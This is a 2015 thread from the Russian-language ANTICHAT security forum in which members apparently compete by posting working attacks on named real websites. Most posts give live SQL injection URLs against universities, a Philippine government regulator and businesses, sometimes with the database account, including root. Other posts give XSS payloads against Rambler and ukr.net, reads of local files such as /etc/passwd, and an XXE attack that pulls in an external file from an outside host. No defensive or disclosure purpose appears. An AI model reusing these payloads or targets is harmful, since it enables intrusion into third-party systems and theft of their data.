HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 23.07.2015, 15:52
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target:http://som.adzu.edu.ph

type:SQL Injection

version:10.0.20-MariaDB-log

user:som@localhost

Код:
Code:
http://som.adzu.edu.ph/newsupdates/index.php?id=-1+union+select+1,version(),table_name,user(),5,6+from+information_schema.tables+--+


target:http://www.bulsu.edu.ph

type:SQL Injection

version:5.1.63-community-log

user:bulsued_friedel@207.198.102.22

Код:
Code:
http://www.bulsu.edu.ph/footer.php?id=-2 UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES


target:http://www.ntc.gov.ph

[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]type:[/COLOR][COLOR="rgb(191, 191, 191)"]SQL Injection[/COLOR][/COLOR]

version:10.0.15-MariaDB

[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]user:[/COLOR]root@localhost[/COLOR]

Код:
Code:
http://www.ntc.gov.ph/announcements_news.php?id=-24+union+select+1,version(),user(),4,table_name,6,7+from+information_schema.tables+--+
[COLOR="rgb(255, 153, 153)"]target:[/COLOR]http://www.irishsanghatrust.ie

[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]type:[/COLOR]SQL Injection[/COLOR]

[COLOR="rgb(255, 153, 153)"]version:[/COLOR][COLOR="rgb(191, 191, 191)"]5.0.83-community[/COLOR]

[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]user:[/COLOR]u1094094_sangha@172.16.5.126[/COLOR]

[COLOR="rgb(191, 191, 191)"]
Код:
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version(),user(),4,5,6,7,table_name,9,10,11,12,13,141,15,16,17,18+from+information_schema.tables+--+
[/COLOR]

target:http://www.mtzwear.com

[COLOR="rgb(191, 191, 191)"][COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]type:[/COLOR]SQL Injection[/COLOR][/COLOR]

[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]version:[/COLOR][COLOR="rgb(191, 191, 191)"]5.5.10[/COLOR]

[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]user:[/COLOR]mtzwear.com@localhost[/COLOR][/COLOR]

[COLOR="rgb(191, 191, 191)"][COLOR="rgb(191, 191, 191)"]
Код:
Code:
http://www.mtzwear.com/eng/art_catalogo.php?id=-43 union select 1,2,3,4,5,6,7,8,table_name,user(),11 from information_schema.tables
[/COLOR]
[/COLOR]
 
Ответить с цитированием

  #62  
Старый 24.07.2015, 07:03
user6334
Guest
Сообщений: n/a
Провел на форуме:
91312

Репутация: 12
По умолчанию

Site: http://www.packsend.co.uk

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.packsend.co.uk/news.php?n=-1+UNION+SELECT+1,2,user(),4,5,6,7,8+--+
 
Ответить с цитированием

  #63  
Старый 26.07.2015, 01:34
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target: http://www.romanianwriters.ro

type: SQL Injection

version: 5.1.61-0ubuntu0.10.10.1

user: romanian_rowri@localhost


Код:
Code:
http://www.romanianwriters.ro/s.php?id=-1'+UNION+select+1,convert(table_name using latin1),3+from+information_schema.tables+limit+1,1+--+


target: http://www.bransonparksandrecreation.com

type: SQL Injection

version: 5.0.96-log1

user: bransonparks@173.201.216.51


Код:
Code:
http://www.bransonparksandrecreation.com/page.php?id=74 and(select 1 from(select count(*),concat((select (select concat(table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1+--+
target: http://www.microtekusa.com/

type: SQL Injection

version: 5.0.77

user: root@localhost


Код:
Code:
http://www.microtekusa.com/products.php?KindID=3&ID=-34+union+select+1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,table_name,57,58,59,60,61,62,63,64,65,66+from+information_schema.tables+--+

 
Ответить с цитированием

  #64  
Старый 26.07.2015, 06:57
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Нашел на Рамблере XSS:

Код:
Code:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
Нашел на ukr.net

Код:
Code:
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов

Код:
Code:
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity

Код:
Code:
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:

Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл

Код:
Code:

]>
И потом выводим на экран &passwd;

P.S. Извините, проверил топ-таблицу, оказывается я не первый
 
Ответить с цитированием

  #65  
Старый 31.07.2015, 15:01
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

таблицу обновил, всем добавил. прошу проверять на повторы: повторами считаются везде, где уязвимость выкладывали.

Цитата:
Сообщение от ocheretko  
ocheretko said:

Нашел на Рамблере XSS:
Код:
Code:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
Нашел на ukr.net
Код:
Code:
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов
Код:
Code:
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity
Код:
Code:
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:
Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл
Код:
Code:

]>
И потом выводим на экран
&passwd;
P.S. Извините, проверил топ-таблицу, оказывается я не первый
вы первый. я себе XXE написал для примера, а вам добавил. хорошая работа
 
Ответить с цитированием

  #66  
Старый 04.08.2015, 02:16
3nvY
Guest
Сообщений: n/a
Провел на форуме:
15245

Репутация: 11
По умолчанию

Сайт: http://ww2.odu.edu

Уязвимость: LFR

Эксплоит:

Код:
Code:
http://ww2.odu.edu/ao/facultyhandbook/index.php?page=../index.php
В исходниках страницы видно PHP код. Только это мало что даёт, по крайней мере для меня.
 
Ответить с цитированием

  #67  
Старый 04.08.2015, 15:06
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target: http://www.cymbeline.com

type: SQL Injection

version: 5.1.73

user: cymbeline@localhost

Код:
Code:
http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+3,1+--+
target: http://igamer.su

type: SQL Injection

version: 5.1.73

user: db_user_igamer@localhost


Код:
Code:
http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+3,1+--+
target: http://www.kirpichi.kz

type: SQL Injection

version: 5.5.44-cll-lve

user: V_8337_KIRPICH@LOCALHOST

Код:
Code:
http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+3,1+--+&show=calc
[COLOR="rgb(255, 153, 153)"]target:[/COLOR] http://www.qbele.com.br

[COLOR="rgb(255, 153, 153)"]type:[/COLOR] SQL Injection

[COLOR="rgb(255, 153, 153)"]version:[/COLOR] 5.1.73-rel14.11-log

[COLOR="rgb(255, 153, 153)"]user:[/COLOR] site1371378569@186.202.153.159

Код:
Code:
http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user(),table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+information_schema.tables+limit+3,1+--+&qCid=Todas

 
Ответить с цитированием

  #68  
Старый 07.08.2015, 13:18
blud_niy
Guest
Сообщений: n/a
Провел на форуме:
1923

Репутация: 0
По умолчанию

Site: http://www.gorodokboxing.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+
Site: http://www.malnaditimudigere.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+
Site: http://glamdring.baac.or.th

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+
Site: http://web-sayansk.net

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+
Site: http://www.replacement-windows.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name,8,9,10,user(),12,13,14,15,16,17,18,19+from+information_schema.tables+limit+1,1+--+
Site: http://www.bellebuddy.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
Site: http://www.babilon-nyelvstudio.hu

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),table_name,10,11,12,13,14,15,16+from+information_schema.tables+limit+3,1+--+
 
Ответить с цитированием

  #69  
Старый 12.08.2015, 15:14
blud_niy
Guest
Сообщений: n/a
Провел на форуме:
1923

Репутация: 0
По умолчанию

подскажите... а что, конкурс уже завершился?
 
Ответить с цитированием

  #70  
Старый 12.08.2015, 15:33
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от blud_niy  
blud_niy said:

подскажите... а что, конкурс уже завершился?
нет, добавляю по возможности
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ